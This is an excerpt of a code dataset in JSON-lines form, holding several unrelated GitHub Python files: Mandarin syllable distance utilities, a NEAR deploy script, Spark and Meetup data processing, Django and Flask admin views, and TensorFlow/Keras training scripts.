return self._compound_onset(on1, gl1, on2, gl2)\n # elif not self._all_slots(gls):\n # # RULE 6\n # return self._compound_onset(on1, gl1, on2, gl2)\n\n\n # elif self._all_slots(syl1):\n # if not self._any_slots(syl2):\n # # RULE 5\n # # ALL OF SYL1 / NONE OF SYL2\n # elif self._any_slots(syl2):\n # # RULE 6\n # # ALL OF SYL1 / ONE OF SYL2\n # elif self._all_slots(syl2):\n # if not self._any_slots(syl1):\n # # RULE 7\n # # ALL OF SYL2 / NONE OF SYL1\n # elif self._any_slots(syl1):\n # # RULE 8\n # # ALL OF SYL2 / ONE OF SYL1\n\n # def _compound_onset(self, on1, gl1, on2, gl2):\n # on_distance = self._compute_distance(on1, on2)\n # gl_distance = self._conpute_distance(gl1, gl2)\n # return on_distance + gl_distance\n #\n # def _get_slot(self, slot, syllable):\n # return self.syllables[syllable][slot]\n #\n # def _any_slots(self, slots):\n # return any(True if x != [0,0,0] else False for x in slots)\n #\n # def _all_slots(self, slots):\n # return all(True if x != [0,0,0] else False for x in slots)\n\n # def all_distances(self, s1, s2):\n # return ([\n # self.slot_distance('onset', s1, s2),\n # self.slot_distance('glide', s1, s2),\n # self.slot_distance('nucleus', s1, s2),\n # self.slot_distance('coda', s1, s2),\n # self.slot_distance('tone', s1, s2)\n # ])\n\n def syllable_distance(self, s1, s2):\n decimal.getcontext().prec = 5\n # distances = self.all_distances(s1, s2)\n # distances = [Decimal(x) for x in distances]\n\n onset = self.onset_distance(s1, s2)\n rime = self.rime_distance(s1, s2)\n tone = self._slot_distance('tone', s1, s2)\n return float(sum([onset, rime, tone]))\n\n def _compute_distance(self, l1, l2):\n decimal.getcontext().prec = 5\n if type(l1) is list:\n return float((\n decimal.getcontext().power((Decimal(l2[0]) - Decimal(l1[0])), 2)\n + decimal.getcontext().power((Decimal(l2[1]) - Decimal(l1[1])), 2)\n + decimal.getcontext().power((Decimal(l2[2]) - Decimal(l1[2])), 2)\n ).sqrt())\n else:\n return float(decimal.getcontext().abs(Decimal(l1) - Decimal(l2)))\n # val = float(decimal.getcontext().abs(Decimal(l1) - Decimal(l2)))\n # print('{}, {} = {}'.format(Decimal(l1), Decimal(l2), val))\n # return val\n\ndef load_syllables():\n syllables_file = pathlib.Path('data/revsyllables.json')\n with syllables_file.open('r', encoding='utf-8') as f:\n return _Syllables(json.load(f))\n\nunihan = load_unihan()\n# print(len(unihan))\n#\ncedict, cedictchars = load_cedict()\n# print(len(cedict))\n# print(len(cedictchars))\n\nhsk = load_hsk()\n# print(len(hsk))\n# print(len(hsk['word']))\n# print(len(hsk['char']))\n\nsubtlex = load_subtlex()\n# print(len(subtlex['char']))\n# print(len(subtlex['word']))\n\nradicals = load_radicals()\n\nsyllables = load_syllables()\n","repo_name":"NickAnderegg/hanzi-orthophonology","sub_path":"handata.py","file_name":"handata.py","file_ext":"py","file_size_in_byte":17034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"7080034109","text":"#!/usr/bin/env python3\n\nimport sys\nfrom pathlib import Path\n\nsys.path.insert(0, str(Path(__file__).parent.parent.joinpath(\"tests\")))\n\nimport os\nfrom setup_localnet import setup_core_contracts\n\nPROJECT_ROOT = Path(__file__).parent.parent.resolve()\n\n\ndef main() -> None:\n near_home = Path(\n os.environ.get(\"NEAR_HOME\", PROJECT_ROOT.joinpath(\".data/near/localnet\"))\n )\n state_file = near_home / \"setup-contracts\"\n if state_file.exists():\n return\n setup_core_contracts(near_home, node_port=33300)\n state_file.write_text(\"OK\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DDeAlmeida/kuutamod","sub_path":"scripts/deploy-contracts.py","file_name":"deploy-contracts.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"1695229818","text":"import os\r\nfrom utility.Config import *\r\nfrom utility.Spark import *\r\nfrom utility.utils import *\r\n\r\n\r\nclass DataExploration:\r\n def __init__(self):\r\n self.spark = get_spark_session(\"hdsdsdsd\")\r\n self.filename = updated_filename\r\n self.df_target = read_csv(self.filename)\r\n # self.del_file() \r\n\r\n def calculate_temperature_average(self):\r\n # smart_194_raw is temperation SMART Statistic\r\n # self.df_target = self.df_target\\\r\n # .groupBy([\"MFG\",\"model\"])\\\r\n # .agg(round(mean(\"smart_194_raw\"),2).alias(\"avg_Temp\"))\\\r\n # .orderBy(\"avg_Temp\") \r\n # self.df_target.show()\r\n self.correlation_temp_failure(self.df_target) \r\n \r\n def correlation_temp_failure(self,df):\r\n get_all_maker_corr = df.groupBy(\"model\").agg(\r\n corr(\"smart_194_raw\",\"failure\").alias(\"correlation\")).collect() \r\n\r\n for row in get_all_maker_corr:\r\n print(row[\"MFG\"],\":\",row[\"correlation\"])\r\n\r\n \r\n \r\n\r\n","repo_name":"riahtu/predictive_maintenance-2","sub_path":"utility/DataExploration.py","file_name":"DataExploration.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"31647806800","text":"from django.contrib import admin\n\nfrom .models import Employee, Parameter, Employee_Para\n\n\nclass Employee_ParaAdmin(admin.ModelAdmin):\n fieldsets = [\n (None, {'fields': ['employee','parameter','weightage','score']}),\n ('Month information', {'fields': ['pub_month'], 'classes': ['collapse']}),\n ]\n\n\n\n\nadmin.site.register(Employee)\nadmin.site.register(Parameter)\nadmin.site.register(Employee_Para, Employee_ParaAdmin)\n# Register your models here.\n","repo_name":"ambersingh/performance","sub_path":"perform/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"18888036504","text":"#-*- coding: utf-8 -*-\nfrom django.shortcuts import render\nfrom quadratic.forms import QuadraticForm\n\n\ndef quadratic_results(request):\n content = {}\n if request.GET:\n form = QuadraticForm(request.GET)\n if form.is_valid():\n data = form.cleaned_data\n var_a = data['a']\n var_b = data['b']\n var_c = data['c']\n d = var_b**2 - 4*var_a*var_c\n content['d'] = d\n if d == 0:\n content['x1'] = round(float((-var_b + d ** (1/2.0))/ 2.0*var_a))\n elif d > 0:\n content['x1'] = round(float((-var_b + d ** (1/2.0))/ 2.0*var_a))\n content['x2'] = round(float((-var_b - d ** (1/2.0))/ 2.0*var_a))\n else:\n content['x1'] = ''\n else:\n form = QuadraticForm()\n content['form'] = form\n return render(request, \"results.html\", content)\n","repo_name":"Kovekser/Pybursa_project","sub_path":"quadratic/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"24077589885","text":"\"\"\"\nObjects controller.\n\"\"\"\nfrom typing import Any, Optional\nfrom flask import Blueprint, request, abort, render_template, flash, redirect\nfrom project.decorators.security_decorators import login_required\nfrom project.decorators.context_decorators import process_context\nfrom project.entities.object_entity import ObjectEntity\nfrom project.models.object_model import ObjectModel\nfrom project.utils import record_utils\nfrom project.utils.data_utils import set_properties_value\nfrom project.utils.ctrl_utils import generate_admin_url\nfrom project.services import history_service\nfrom project.services import object_service\nfrom project.enums import object_enum\nfrom project.enums import string_types_enum as str_type\nfrom project.enums import table_enum\nimport json\n\n\n# Blueprint data\nblueprint = Blueprint(\n name='admin_objects_ctrl',\n import_name=__name__,\n url_prefix='//admin/objects'\n)\n\n\n###############################################################################\n# View Routes\n###############################################################################\n\n\n@blueprint.route(\n rule='/',\n methods=['GET'],\n defaults={'object_name': None}\n)\n@blueprint.route(\n rule='/',\n methods=['GET']\n)\n@login_required()\n@process_context()\ndef list_objects_view(context: str, object_name: Optional[str] = None\n ) -> Any:\n \"\"\"\n List content view endpoint.\n \"\"\"\n root_url = generate_admin_url(context, 'objects')\n back_url = generate_admin_url(\n context, 'objects'\n )\n change_order_url = generate_admin_url(\n context, 'objects', 'change_order', object_name if object_name else '',\n )\n referrer_url = request.referrer\n headers = [\n '#',\n 'Name',\n 'Type',\n 'Published',\n 'URL',\n 'Created On',\n 'Edit',\n 'Children',\n ]\n objects: list[ObjectEntity] = list()\n children: list[ObjectModel] = list()\n data: list[Any] = list()\n title = 'Root'\n parent_name = None\n\n # Get record and data\n if object_name is not None:\n entity = object_service.select_by_name(context, object_name)\n if not entity:\n return abort(400)\n record = object_service.get_record_by_name(entity.object_type)\n if not record:\n return abort(400)\n if entity.reference_name:\n parent = object_service.select_by_name(\n context, entity.reference_name\n )\n if not parent:\n return abort(400)\n parent_name = parent.name\n back_url = generate_admin_url(\n context, 'objects', parent.name,\n )\n title = entity.name\n children = object_service.get_records_by_names(record.children)\n objects = object_service.select_by_reference(context, entity.name)\n else:\n children = object_service.get_root_records()\n objects = object_service.select_root_objects(context)\n\n # Filter children\n children = [child for child in children if child.allow_actions]\n\n # Parse entities\n for entity in objects:\n record = object_service.get_record_by_name(entity.object_type)\n if record is None:\n continue\n\n published = entity.properties.get('published', '1') == str_type.TRUE\n if record.is_content and published:\n url = f'{entity.url}'\n else:\n url = '-'\n\n data.append((\n entity.object_order,\n f' '\n f'{entity.name}',\n f'{record.name}',\n f' True ' if published else 'False',\n url,\n entity.created_on,\n f' '\n f'Edit',\n f' '\n f'Children'\n ))\n\n # Render template\n return render_template(\n '/admin/object_list.html',\n page_data=dict(\n object_name=object_name,\n headers=headers,\n data=data,\n root_url=root_url,\n referrer_url=referrer_url,\n title=title,\n children=children,\n back_url=back_url,\n parent_name=parent_name,\n change_order_url=change_order_url,\n )\n )\n\n\n@blueprint.route(\n rule='/change_order',\n methods=['GET'],\n defaults={'object_name': None}\n)\n@blueprint.route(\n rule='/change_order/',\n methods=['GET']\n)\n@login_required()\n@process_context()\ndef change_order_view(context: str, object_name: Optional[str] = None\n ) -> Any:\n \"\"\"\n Change order view endpoint.\n \"\"\"\n back_url = generate_admin_url(\n context, 'objects'\n )\n action_url = generate_admin_url(\n context, 'objects', 'save_order'\n )\n referrer_url = request.referrer\n objects: list[ObjectEntity] = list()\n data: list[Any] = list()\n title = 'Root'\n\n # Get record and data\n if object_name is not None:\n back_url = generate_admin_url(\n context, 'objects', object_name,\n )\n title = object_name\n objects = object_service.select_by_reference(context, object_name)\n else:\n objects = object_service.select_root_objects(context)\n\n # Parse entities\n for entity in objects:\n object_type = object_service.get_record_by_name(\n entity.object_type\n )\n if not object_type:\n continue\n data.append({\n \"id\": entity.id,\n \"order\": entity.object_order,\n \"name\": f' {entity.name}',\n \"type\": object_type.name\n })\n\n # Render template\n return render_template(\n '/admin/object_order_list.html',\n page_data=dict(\n object_name=object_name,\n data=data,\n referrer_url=referrer_url,\n title=title,\n back_url=back_url,\n action_url=action_url,\n )\n )\n\n\n@blueprint.route(\n rule='//create',\n methods=['GET'],\n defaults={'reference_name': None}\n)\n@blueprint.route(\n rule='//create/',\n methods=['GET']\n)\n@login_required()\n@process_context()\ndef create_view(context: str, object_type: str,\n reference_name: Optional[str] = None) -> Any:\n \"\"\"\n Render create page.\n \"\"\"\n record = object_service.get_record_by_name(object_type)\n referrer_url = request.referrer\n if not record:\n return abort(400)\n\n back_url = generate_admin_url(\n context, 'objects'\n )\n action_url = generate_admin_url(\n context, 'objects', 'create'\n )\n if reference_name is not None:\n parent = object_service.select_by_name(context, reference_name)\n if parent:\n back_url = generate_admin_url(\n context, 'objects', parent.name\n )\n action_url = generate_admin_url(\n context, 'objects', 'create', reference_name\n )\n\n return render_template(\n '/admin/object_form.html',\n page_data=dict(\n context=context,\n object_id=None,\n edit=False,\n object_type=object_type,\n title=object_type,\n action_url=action_url,\n back_url=back_url,\n properties=record.properties,\n allow_actions=record.allow_actions,\n referrer_url=referrer_url,\n reference_name=reference_name,\n )\n )\n\n\n@blueprint.route(\n rule='/edit/',\n methods=['GET']\n)\n@login_required()\n@process_context()\ndef edit_view(context: str, object_id: int) -> Any:\n \"\"\"\n Render edit page.\n \"\"\"\n # Get entity and record\n entity = object_service.select_by_id(object_id)\n if not entity:\n return abort(400)\n\n record = object_service.get_record_by_name(entity.object_type)\n if not record:\n return abort(400)\n\n # URLs\n back_url = generate_admin_url(\n context, 'objects',\n )\n action_url = generate_admin_url(\n context, 'objects', 'edit', str(object_id)\n )\n if entity.reference_name:\n parent = object_service.select_by_name(\n context, entity.reference_name\n )\n if parent:\n back_url = generate_admin_url(\n context, 'objects', parent.name\n )\n\n # Set props\n props = set_properties_value(getattr(record, 'properties'), entity)\n history = history_service.select_by_target_id(\n context, table_enum.OBJECTS, object_id,\n )\n\n # Render\n return render_template(\n '/admin/object_form.html',\n page_data=dict(\n context=context,\n object_id=object_id,\n edit=True,\n object_type=entity.object_type,\n title=entity.object_type,\n back_url=back_url,\n action_url=action_url,\n properties=props,\n history=history,\n name=entity.name,\n allow_actions=record.allow_actions,\n )\n )\n\n\n###############################################################################\n# Action Routes\n###############################################################################\n\n\n@blueprint.route(\n rule='//create',\n methods=['POST']\n)\n@login_required()\n@process_context()\ndef create_action(context: str, object_type: str) -> Any:\n \"\"\"\n Insert content to database.\n \"\"\"\n data = request.form.to_dict()\n root_url = generate_admin_url(\n context, 'objects', object_type,\n )\n new_object = ObjectEntity(\n context=context,\n name=data['name'],\n properties=data,\n object_type=object_type,\n )\n try:\n entity_id = object_service.insert(new_object)\n flash('Content created successfully!', category='success')\n return redirect(f'{root_url}/edit/{entity_id}')\n except Exception as err:\n flash(str(err), category='danger')\n return redirect(request.referrer)\n\n\n@blueprint.route(\n rule='/edit/',\n methods=['POST']\n)\n@login_required()\n@process_context()\ndef edit_action(context: str, object_id: int) -> Any:\n \"\"\"\n Update content in database.\n \"\"\"\n data = request.form.to_dict()\n root_url = generate_admin_url(\n context, 'objects',\n )\n try:\n object_service.update(object_id, data)\n flash('Content updated successfully!', category='success')\n return redirect(f'{root_url}/edit/{object_id}')\n except Exception as err:\n flash(str(err), category='danger')\n return redirect(request.referrer)\n\n\n@blueprint.route(\n rule='/delete/',\n methods=['GET']\n)\n@login_required()\n@process_context()\ndef delete_action(context: str, object_id: int) -> Any:\n \"\"\"\n Delete content from database.\n \"\"\"\n root_url = generate_admin_url(\n context, 'objects',\n )\n try:\n object_service.delete(object_id)\n flash(f'Content {object_id} sent to trash bin', category='success')\n return redirect(root_url)\n except Exception as err:\n flash(str(err), category='danger')\n return redirect(request.referrer)\n\n\n@blueprint.route(\n rule='/duplicate///',\n methods=['GET']\n)\n@login_required()\n@process_context()\ndef duplicate_action(context: str, object_id: int, to_context: str,\n new_name: str) -> Any:\n \"\"\"\n Duplicate content.\n \"\"\"\n root_url = generate_admin_url(\n context, 'objects',\n )\n try:\n object_service.duplicate(object_id, to_context, new_name)\n flash('Content duplicated successfully!', category='success')\n return redirect(root_url)\n except Exception as err:\n flash(str(err), category='danger')\n return redirect(request.referrer)\n\n\n@blueprint.route(\n rule='/save_order',\n methods=['POST']\n)\n@login_required()\n@process_context()\ndef save_order_action(context: str) -> Any:\n \"\"\"\n Save order endpoint.\n \"\"\"\n data = request.form.to_dict()\n json_data: list[dict[str, Any]] = json.loads(data['json_data'])\n try:\n for item in json_data:\n object_service.update_order(\n int(item['id']), int(item['object_order'])\n )\n flash('Order updated successfully!', category='success')\n return redirect(data['back_url'])\n except Exception as err:\n flash(str(err), category='danger')\n return redirect(request.referrer)\n\n\n###############################################################################\n# Ajax Routes\n###############################################################################\n\n\n@blueprint.route(\n rule='/exists/',\n methods=['GET']\n)\n@login_required()\ndef object_exists(context: str, name: str) -> Any:\n \"\"\"\n Verify if object exists.\n \"\"\"\n exists = object_service.object_exists(\n context, name\n )\n return dict(exists=exists)\n","repo_name":"vinibiavatti1/PythonFlaskCms","sub_path":"project/controllers/admin/objects_ctrl.py","file_name":"objects_ctrl.py","file_ext":"py","file_size_in_byte":13155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"20828605329","text":"import tensorflow as tf\nimport numpy as np\nimport argparse\nimport random\nimport args\nimport sys\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nFLAGS = args.get()\n\ndef generate_dataset(num):\n train_data_list = []\n data_list = []\n label_list = []\n for i in range(num):\n r = np.random.normal()\n t = np.random.uniform(0, np.pi * 2)\n\n data = np.array([[r*np.cos(t), r*np.sin(t)]])\n label = np.array([[1, 0]])\n data_list.append(data)\n label_list.append(label)\n\n data = np.array([[(r+5)*np.cos(t), (r+5)*np.sin(t)]])\n label = np.array([[0, 1]])\n data_list.append(data)\n label_list.append(label)\n\n train_data_list = [data_list, label_list]\n\n \"\"\"\n fig, ax = plt.subplots(nrows=1, ncols=1)\n ax.set_xlabel('1st column')\n ax.set_ylabel('2nd column')\n ax.set_title('Classification')\n\n for i in range(num):\n if label_list[i][0,0] == 1:\n ax.plot(data_list[i][0,0], data_list[i][0,1], 'C0o')\n elif label_list[i][0,1] == 1:\n ax.plot(data_list[i][0,0], data_list[i][0,1], 'C9o')\n\n fig.savefig('task1-test.png')\n plt.close(fig)\n sys.exit(-1)\n \"\"\"\n\n return train_data_list\n\ndef shuffle_dataset(dataset_list, label_list):\n l = list(zip(dataset_list, label_list))\n random.shuffle(l)\n dataset_list_ , label_list_ = zip(*l)\n\n return dataset_list_, label_list_\n\ndef build_model():\n x = tf.placeholder(tf.float32, shape=[None, 2])\n y_label = tf.placeholder(tf.float32, shape=[None, 2])\n\n w_0 = tf.Variable(tf.truncated_normal([2, 20], stddev=0.01))\n b_0 = tf.Variable(tf.constant(0.1, shape=[20]))\n h_0 = tf.nn.relu(tf.matmul(x, w_0) + b_0)\n\n w_1 = tf.Variable(tf.truncated_normal([20, 2], stddev=0.01))\n b_1 = tf.Variable(tf.constant(0.1, shape=[1]))\n h_1 = tf.nn.softmax(tf.matmul(h_0, w_1) + b_1)\n\n y = h_1\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels = y_label, logits = y)\n\n return x, y, h_0, y_label, cross_entropy\n\ndef get_batch(train_dataset, index, batch_num):\n #if len(train_dataset) < index * args.batch_num\n margin = (index + 1) * batch_num - len(train_dataset[0])\n if margin > 0:\n batch_data = train_dataset[0][index * batch_num : len(train_dataset)]\n batch_data.append(train_dataset[0][0:margin])\n a = np.array(batch_data)\n #batch_data.concatenate(batch_data, train_dataset[0][0: margin])\n batch_label = train_dataset[1][index * batch_num : len(train_dataset)]\n batch_data.append(train_dataset[1][0:margin])\n else:\n batch_data = train_dataset[0][index * batch_num : (index + 1) * FLAGS.batch_num]\n batch_label = train_dataset[1][index * batch_num : (index + 1) * FLAGS.batch_num]\n\n batch_data_arr = np.squeeze(np.array(batch_data), axis = 1)\n batch_label_arr = np.squeeze(np.array(batch_label), axis = 1)\n\n #print(batch_data_arr.shape, batch_label_arr.shape)\n\n return batch_data_arr, batch_label_arr\n\n #return [np.array(batch_data).squeeze(reshape(len(batch_data), 2), np.array(batch_label).reshape(len(batch_data), 2)]\n\ndef main(not_parsed_args):\n if len(not_parsed_args) > 1:\n print(\"Unknown args:%s\" % not_parsed_args)\n exit()\n\n #dataset generation\n train_dataset = generate_dataset(FLAGS.train_dataset_num)\n valid_dataset = generate_dataset(FLAGS.valid_dataset_num)\n test_dataset = generate_dataset(FLAGS.test_dataset_num)\n\n #build model\n x, y, h_0, y_label, cross_entropy = build_model()\n optimizer = tf.train.AdamOptimizer(FLAGS.initial_lr).minimize(cross_entropy)\n\n correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_label, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n #training\n for i in range(FLAGS.epoch):\n shuffle_dataset(train_dataset[0], train_dataset[1])\n\n for j in range(int(len(train_dataset[0]) / FLAGS.batch_num)):\n batch = get_batch(train_dataset, j, FLAGS.batch_num)\n _ = sess.run([optimizer], feed_dict={x: batch[0], y_label: batch[1]})\n\n #print(batch[0].shape)\n\n if j%50==49:\n valid_data_arr = np.array(valid_dataset[0])\n valid_label_arr = np.array(valid_dataset[1])\n valid_data_arr = np.squeeze(valid_data_arr, axis=1)\n valid_label_arr = np.squeeze(valid_label_arr, axis=1)\n accuracy_train = sess.run(accuracy, feed_dict={x: batch[0], y_label: batch[1]})\n accuracy_valid = sess.run(accuracy, feed_dict={x: valid_data_arr, y_label: valid_label_arr})\n print(\"epoch: %d, step: %d, train-accuracy: %.3f valid-accuracy: %.3f\"%(i+1, j+1, accuracy_train, accuracy_valid))\n\n\n #test image plot\n test_data_arr = np.array(test_dataset[0])\n test_label_arr = np.array(test_dataset[1])\n test_data_arr = np.squeeze(test_data_arr, axis=1)\n test_label_arr = np.squeeze(test_label_arr, axis=1)\n\n test_output,accuracy_ = sess.run([y, accuracy], feed_dict={x: test_data_arr, y_label: test_label_arr})\n print(\"test-accuracy: %.3f\"%(accuracy_))\n\n\n hidden_layer_output = sess.run(h_0, feed_dict={x: test_data_arr, y_label: test_label_arr})\n #print(hidden_layer_output.shape)\n\n #line plotting (active region, inactive region)\n line_x_inactive = [[] for x in range(np.size(hidden_layer_output, 1))]\n line_y_inactive = [[] for x in range(np.size(hidden_layer_output, 1))]\n line_x_active = [[] for x in range(np.size(hidden_layer_output, 1))]\n line_y_active= [[] for x in range(np.size(hidden_layer_output, 1))]\n\n #hidden_layer_sum = np.sum(hidden_layer_output, axis=1)\n #print(hidden_layer_sum.shape)\n\n for i in range(np.size(hidden_layer_output, 0)):\n for j in range(np.size(hidden_layer_output, 1)):\n if hidden_layer_output[i][j] == 0:\n line_x_inactive[j].append(test_data_arr[i][0])\n line_y_inactive[j].append(test_data_arr[i][1])\n else:\n line_x_active[j].append(test_data_arr[i][0])\n line_y_active[j].append(test_data_arr[i][1])\n \"\"\"\n for i in range(np.size(test_output, 0)):\n if test_output[i, 0] - test_output[i, 1] > -0.01 and test_output[i, 0] - test_output[i, 1] < 0.01:\n line_x_inactive.append(test_data_arr[i][0])\n line_y_inactive.append(test_data_arr[i][1])\n\n \"\"\"\n\n #test point plotting\n for i in range(np.size(hidden_layer_output, 1)):\n fig, ax = plt.subplots(nrows=1, ncols=1)\n ax.set_xlabel('1st column')\n ax.set_ylabel('2nd column')\n ax.set_title('Boundary')\n\n ax.plot(line_x_inactive[i], line_y_inactive[i], 'ro')\n ax.plot(line_x_active[i], line_y_active[i], 'bo')\n\n fig.savefig('task1-active-inactive-{}.png'.format(i))\n plt.close(fig)\n\n fig, ax = plt.subplots(nrows=1, ncols=1)\n ax.set_xlabel('1st column')\n ax.set_ylabel('2nd column')\n ax.set_title('Classification')\n\n for i in range(np.size(test_output, 0)):\n if test_output[i, 0] > test_output[i, 1]:\n ax.plot(test_data_arr[i][0], test_data_arr[i][1], 'ro')\n elif test_output[i, 0] < test_output[i, 1]:\n ax.plot(test_data_arr[i][0], test_data_arr[i][1], 'bo')\n #ax.plot(line_x_inactive, line_y_inactive, 'og-')\n\n fig.savefig('task1-classify.png')\n plt.close(fig)\n\nif __name__ == '__main__':\n tf.app.run()\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"githjh/EE488","sub_path":"project1-hhyeo/project1_task1.py","file_name":"project1_task1.py","file_ext":"py","file_size_in_byte":7819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"24329624192","text":"import random\n\nname = input(\"What is your name? \")\nquestion = input(\"What is your question? (Preferably make it a yes no question) \")\nrng = random.randint(1, 9)\nif rng == 1:\n answer = \"Yes - definitely.\"\nelif rng == 2:\n answer = \"It is decidedly so.\"\nelif rng == 3:\n answer = \"Without a doubt.\"\nelif rng == 4:\n answer = \"Reply hazy, try again.\"\nelif rng == 5:\n answer = \"Ask again later.\"\nelif rng == 6:\n answer = \"Better not tell you now.\"\nelif rng == 7:\n answer = \"My sources say no.\"\nelif rng == 8:\n answer = \"Outlook not so good.\"\nelif rng == 9:\n answer = \"Very doubtful.\"\nelse:\n answer = \"Error: Number is not within the range specified or is a float\"\n\n#print(question == None)\n\n# If no question is put in, it will ask for a question\nif question == \"\":\n print(\"You Need To Ask A Question!\")\nelif name == \"\":\n print(\"Question: \" + question)\n print(\"Magic 8-Ball's answer: \" + answer)\nelse:\n print(name + \" asks: \" + question)\n print(\"Magic 8-Ball's answer: \" + answer)","repo_name":"Pulucas/Learning-Python","sub_path":"magic8.py","file_name":"magic8.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"70430359990","text":"import requests\nimport json\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime\nfrom pyspark.sql import functions as F\nfrom pyspark.sql import types as T\nfrom pyspark.sql.functions import udf\n\n\nclass Event:\n\n def __init__(self, spark, data, geocode, *args, **kwargs):\n self.spark = spark\n self.data = data\n self.geocode = geocode\n\n def build_df(self, *args, **kwargs):\n \"\"\"\n Build a SparkDataframe based on json response.\n Args:\n Spark (object): Spark Session\n data (json array): Event data from meetup api\n\n \"\"\"\n\n columns = ['id', 'date', 'year', 'month', 'day', 'country', 'city', 'state,', 'address',\n 'meetup_name', 'meetup_group_name', 'description', 'event_url', 'yes_rsvp_count', 'status']\n id, date, year, month, day, country, city, state, address, meetup_name, meetup_group_name, description, event_url, yes_rsvp_count, status = ([\n ] for i in range(15))\n\n # Iterate over events\n for label in self.data:\n date_event = datetime.fromtimestamp(label['time'] / 1000.0)\n\n id.append(label['id'])\n date.append(date_event)\n year.append(date_event.year)\n month.append(date_event.month)\n day.append(date_event.year)\n\n if label.get('venue'):\n country.append(label['venue'].get('country'))\n city.append(label['venue'].get('city'))\n state.append(label['venue'].get('state'))\n address.append(label['venue'].get('address_1'))\n else:\n location_json = self.geocode.reverse_geocode(\n label['group'].get('group_lat'), label['group'].get('group_lon'))\n country.append(location_json[0]['components'].get('country_code'))\n city.append(location_json[0]['components'].get('city'))\n state.append(location_json[0]['components'].get('state'))\n address.append(location_json[0].get('formatted'))\n\n meetup_name.append(label.get('name'))\n meetup_group_name.append(label['group'].get('name'))\n description.append(label.get('description'))\n event_url.append(label['event_url'])\n yes_rsvp_count.append(label.get('yes_rsvp_count'))\n status.append(label.get('status'))\n\n # Schema Structure\n schema = T.StructType([\n T.StructField(\"id\", T.StringType(), True),\n T.StructField(\"date\", T.TimestampType(), True),\n T.StructField(\"year\", T.IntegerType(), True),\n T.StructField(\"month\", T.IntegerType(), True),\n T.StructField(\"day\", T.IntegerType(), True),\n T.StructField(\"country\", T.StringType(), True),\n T.StructField(\"city\", T.StringType(), True),\n T.StructField(\"state\", T.StringType(), True),\n T.StructField(\"address\", T.StringType(), True),\n T.StructField(\"meetup_name\", T.StringType(), True),\n T.StructField(\"meetup_group_name\", T.StringType(), True),\n T.StructField(\"description\", T.StringType(), True),\n T.StructField(\"event_url\", T.StringType(), True),\n T.StructField(\"yes_rsvp_count\", T.IntegerType(), True),\n T.StructField(\"status\", T.StringType(), True)\n ])\n\n df_pandas = pd.DataFrame(np.transpose([id, date, year, month, day, country, city, state, address,\n meetup_name, meetup_group_name, description, event_url, yes_rsvp_count, status]), columns=columns)\n\n df = self.spark.createDataFrame(df_pandas, schema=schema)\n\n upper_udf = udf(lambda x: x.upper())\n\n # UDF: Remove tags from description column\n @udf\n def remove_tags_udf(text):\n import re\n TAG_RE = re.compile(r\"<[^>]+>\")\n return TAG_RE.sub('', text)\n\n # # Apply udf functions\n df_upper = df.withColumn('country', upper_udf(df.country))\n df_tags = df_upper.withColumn('description', remove_tags_udf(df_upper.description))\n\n return df_tags\n\n @staticmethod\n def write_df(df):\n df.write.format(\"com.mongodb.spark.sql.DefaultSource\").mode(\"append\").option(\n \"database\", \"meetup\").option(\"collection\", \"events\").save()\n","repo_name":"kennycontreras/meetup-collector","sub_path":"event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":4365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"12800278808","text":"import keras\nimport tensorflow as tf\nimport tensorflow_addons as tfa\nimport keras_wrn\n\nimport sys\n\nfrom keras.optimizers import SGD\n\nprefix = sys.argv[1]\n\n(x_train, y_train), (x_test, y_test) = keras.datasets.cifar10.load_data()\ny_train = keras.utils.to_categorical(y_train)\ny_test = keras.utils.to_categorical(y_test)\n\nshape, classes = (32, 32, 3), 10\n\nmodel_depth = 28\nmodel_width = 2\n\nmodel = keras_wrn.build_model(shape, classes, model_depth, model_width)\n# optimizer = tfa.optimizers.SGDW(weight_decay=0.0005, momentum=0.9, learning_rate=0.1)\n# model.compile(optimizer, \"categorical_crossentropy\", [\"accuracy\"])\nopt = SGD(lr=0.1, momentum=0.9, nesterov=True)\nmodel.compile(loss='categorical_crossentropy',\n optimizer=opt,\n metrics=['accuracy'])\n\n\ndef scheduler(epoch, lr):\n if epoch in (80, 100, 120):\n lr = lr * 0.2 \n return lr\n\ndef model_save_callback(epoch, logs):\n if epoch % 50 == 0 and epoch != 0:\n model.save('model_ckpt/{}_resnet_28_2_{}'.format(prefix, epoch))\n\nsave_call = tf.keras.callbacks.LambdaCallback(on_epoch_end=model_save_callback)\ncallback = tf.keras.callbacks.LearningRateScheduler(scheduler)\n\nmodel.fit(x_train, y_train, batch_size=125, epochs=140, callbacks=[callback, save_call])\n\nmodel.save('models/{}_resnet_{}_{}'.format(prefix, model_depth, model_width))\n\nresults = model.evaluate(x_test, y_test)\nprint(\"test loss, test acc:\", 